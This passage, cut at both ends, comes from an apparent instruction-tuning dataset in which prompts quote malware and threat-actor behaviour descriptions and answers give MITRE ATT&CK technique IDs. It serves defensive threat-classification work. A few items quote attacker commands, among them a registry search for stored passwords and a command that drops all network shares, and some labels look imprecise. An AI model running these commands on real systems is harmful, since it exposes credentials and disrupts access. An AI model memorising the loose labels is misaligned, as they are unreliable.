ID from MITRE ATT&CK framework.,APT3 has been known to side load DLLs with a valid version of Chrome with one of their tools.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If running with root permissions, OSX_OCEANLOTUS.D can create a persistence file in the folder /Library/LaunchDaemons.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dacls has had its payload named with a dot prefix to make it hidden from view in the Finder application.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor has encrypted data symmetrically using a randomly generated Blowfish key which is encrypted with a public RSA key.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, this may be useful for when the target user has a non-network logon session on the system.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mivast has the capability to gather NTLM password information.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may try to get information about registered services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity has been signed with self-signed certificates.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAMMERTOSS binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In order to meet the phishing emails’ infrastructure requirements, disposable domains and emails were used as the delivery medium### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS collects C2 information via a dead drop resolver.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer uses a custom DoS tool that leverages CVE-2015-5374 and targets hardcoded IP addresses of Siemens SIPROTEC devices.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has the ability to exfiltrate documents from infected systems.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun can modify file attributes to hide files.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naid collects the domain name from a compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once a persona has been developed an adversary can use it to create connections to targets of interest.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 also used PowerShell to create new tasks on remote machines, identify configuration settings, evade defenses, exfiltrate data, and to execute other commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Calisto can collect data from user directories.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has used ps to list processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used the Plink utility to tunnel RDP back to C2 infrastructure.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like PowerShell with an LDAP filter.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team's BCS-server tool uses base64 encoding and HTML tags for the communication traffic between the C2 server.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 9: Command logs after execution Network Communications FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NavRAT copies itself into a running Internet Explorer process to evade detection.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These certificates, such as those used for encrypted web traffic , contain information about the registered organization such as name and location.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,creates a backdoor through which remote attackers can upload files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The initial beacon packet for Mis-Type contains the operating system version and file system of the victim.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has stolen credentials from multiple applications and data sources including Windows OS credentials, email clients, FTP, and SFTP clients.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer can use the tokens of users to create processes on infected systems.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon lists the directories for Desktop, program files, and the user’s recently accessed files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC prompts without user interaction and gain access to data.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has used RDP to move laterally in victim environments.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An audit policy, maintained by the Local Security Policy , defines which system events the EventLog service logs.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The reconnaissance modules used with Duqu can collect information on network configuration.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HiddenWasp uses a cipher to implement a decoding function.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles has used a publicly-available PowerShell-based tool, WMImplant.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has used pm.sh to download and install its main payload.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule PowerShell cmdlets on Windows systems.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used netstat -an on a victim to get a listing of network connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has conducted spearphishing campaigns using malicious email attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can deobfuscate and re-assemble code strings for execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot writes data into the Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Pniumj.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya can use two exploits in SMBv1, EternalBlue and EternalRomance, to spread itself to other remote systems on the network.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used move to transfer files to a network share.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT-C-36 has used spearphishing emails with password protected RAR attachment to avoid being detected by the email gateway.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT was delivered with documents using DDE to execute malicious code.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Accounts created by Dragonfly masqueraded as legitimate service accounts.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The encoded payload was a Cobalt Strike httpsstager that was injected into the PowerShell process that ran the command### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used WinRM for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This version injects a malicious module into one of Avast's processes, whereas early versions of the campaign detected Avast and quit### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 malware has created scheduled tasks to establish persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(On the left is NavRAT, and on the right is the shellcode of ROKRAT): We performed the same analysis for the shellcode located in the downloaded image file and the shellcode is not exactly the same, but the design is very similar### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has attempted to get victims to open malicious files such as Windows Shortcuts and/or Microsoft Office documents, sent via email as part of spearphishing campaigns.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Filename Part-I.doc File Size 11349102 bytes MD5 92942c54224cd462dd201ae11a560bb8 SHA1 85a21624df2211af3daf05c86a3fbea8271059d3 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,15 Database dump Decoded, it reveals a detailed log of each affected machine### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobian RAT obfuscates communications with the C2 server using Base64 encoding.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Audit ISAPI filters and search for web shells on Microsoft Exchange servers### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One variant of CloudDuke uses a Microsoft OneDrive account to exchange commands and stolen data with its operators.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer uses custom encryption for C2 that uses 3DES.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store , Inbox, or other mailbox folders.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA can open a command line to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang is known to use RAR with passwords to encrypt data prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Upon finding a vulnerable version, exploit code is delivered to the browser.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kasidet has the ability to search for a given filename on a victim.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Evilnum has used a component called TerraLoader to check certain hardware and file information to detect sandboxed environments.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy attempts to bypass default User Access Control settings by exploiting a backward-compatibility setting found in Windows 7 and later.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higher level execution mediums, such as those of Command and Scripting Interpreters, may also leverage underlying IPC mechanisms.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum uses HTTP for communication with its C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 also leveraged the reconnaissance framework, ScanBox, to capture keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pillowmint has collected credit card data using native API functions.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group tools have contained an application to check performance of USB flash drives.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda can launch an interface where it can execute several commands on the victim’s PC.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel can use a proxy during exfiltration if set in the configuration.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 obtained Ticket Granting Service tickets for Active Directory Service Principle Names to crack offline.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker has copied a random file from the Windows System32 folder to the %APPDATA% location under a different hidden filename.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Explosive has a function to call the OpenClipboard wrapper.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Decrypted OwaAuth log file format### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to identify the username on a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI has used certutil to download and decode base64 encoded strings.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used the command net localgroup administrators to list all administrators part of a local group.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dacls can use HTTPS in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,T9000 gathers and beacons the username of the logged in account during installation.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,write access, to specific users or groups in the domain.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used Putty to access compromised systems.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa has laterally moved using RDP connections.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WMI Filters define conditions that will trigger a Consumer, including system startup, the execution of a program, the passing of a specified time and many others### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Build Tool Most of CARBANAK’s strings are encrypted in order to make analysis more difficult### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also use compromised websites to deliver a user to a malicious application designed to Steal Application Access Tokens, like OAuth tokens, to gain access to protected applications and information.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkVishnya scanned the network for public shared folders.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has gathered all of the running system processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POSHSPY appends a file signature header to encrypted data prior to upload or download.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Javali has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MobileOrder has a command to upload to its C2 server victim browser bookmarks.### Assistant: T1217: Browser Bookmark Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky can delete files it creates from the infected system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBK has the ability to use HTTP in communications with C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Knowledge of a vulnerability may cause an adversary to search for an existing exploit Exploits or to attempt to develop one themselves Exploits.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used a modified version of pentesting tools wmiexec.vbs and secretsdump.py to dump credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HDoor scans to identify open ports on the victim.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In Windows environments, adversaries could obtain details on running processes using the Tasklist utility via cmd or Get-Process via PowerShell.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT can execute its service if the Service key exists.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used VMProtected binaries in multiple intrusions.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious obfuscated VBA code is executed when the macro is first enabled### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The configuration blob is encoded using a simple single-byte XOR scheme### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases, windows that would typically be displayed when an application carries out an operation can be hidden.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used dedicated network connections from one victim organization to gain unauthorized access to a separate organization.### Assistant: T1199: Trusted Relationship" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine , virtual hard drive, or volume.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 has configured payloads to load via LD_PRELOAD.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackMould has the ability to find files on the targeted system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spearphishing with a link is a specific variant of spearphishing.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar can also be configured to inject and execute within specific processes.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHM content is displayed using underlying components of the Internet Explorer browser loaded by the HTML Help executable program .### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 changed domain federation trust settings using Azure AD administrative permissions to configure the domain to accept authorization tokens signed by their own SAML signing certificate.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT can collect process filenames and SID authority level.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse rundll32.exe to proxy execution of malicious code.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BendyBear can check for analysis environments and signs of debugging using the Windows API kernel32!GetTickCountKernel32 call.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can target and steal locally stored emails to support thread hijacking phishing campaigns.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sys10 uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The dynamic loader will try to find the dylibs based on the sequential order of the search paths.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST dynamically resolved C2 infrastructure for randomly-generated subdomains within a parent domain.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pass the hash is a method of authenticating as a user without having access to the user's cleartext password.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used a tool to capture the username on a compromised host in order to register it with C2.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic uses the net use, net session, and netstat commands to gather information on network connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nomadic Octopus executed PowerShell in a hidden window.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about network security appliances may also be exposed to adversaries via online or other accessible data sets .### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT steals credentials stored in Web browsers by querying the sqlite database.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill can wipe the accessible physical or logical drives of the infected machine.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RobbinHood disconnects all network shares from the computer with the command net use * /DELETE /Y.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has enumerated installed applications on macOS devices with built-in utilities such as ls -al /Applications.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp checks for availability of specific ports on servers.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sykipot may gather a list of running processes by running tasklist /v.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used HTTP for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If this function is successfully loaded, it will ultimately spawn a new instance of itself with the Rundll32Call export via a call to rundll32.exe### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner used shell scripts to launch various services and to start/stop the QEMU virtualization.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT enumerates the current user during the initial infection.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack removes itself after execution and can delete files on the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs collects a list of accounts with the command net users.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The example C2s used by older variants of Comnie demonstrates this: Figure 9 Old Comnie variants collecting C2 information Please refer to the Appendix for a script that may be used to decode C2 information from the older Comnie variants### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In macOS and Linux, the currently logged in user can be identified with w and who.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,reg query HKLM /f password /t REG_SZ /s ### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can deliver additional payloads to victim machines.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor can create and execute services to load its payload.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CARROTBAT has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads.### Assistant: T1127: Trusted Developer Utilities Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KARAE can collect system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used various tools to download files, including DGet .### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT executes batch scripts on the victim’s machine, and can launch a reverse shell for command execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has also made use of a variety of URL shorteners for these staged websites.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TG-3390 actors have deployed the OwaAuth web shell to Exchange servers, disguising it as an ISAPI filter### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy installs a keylogger for intercepting credentials and keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has used JuicyPotato to abuse the SeImpersonate token privilege to escalate from web application pool accounts to NT Authority\SYSTEM.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to list local groups: net localgroup administrator >> %temp%\download OilRig has used net localgroup administrators to find local administrators on compromised systems.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CARROTBAT itself is a dropper that allows an attacker to drop and open an embedded decoy file, followed by the execution of a command that will download and run a payload on the targeted machine### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.### Assistant: T1528: Steal Application Access Token" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia gathers the hostname and OS version from the victim’s machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and 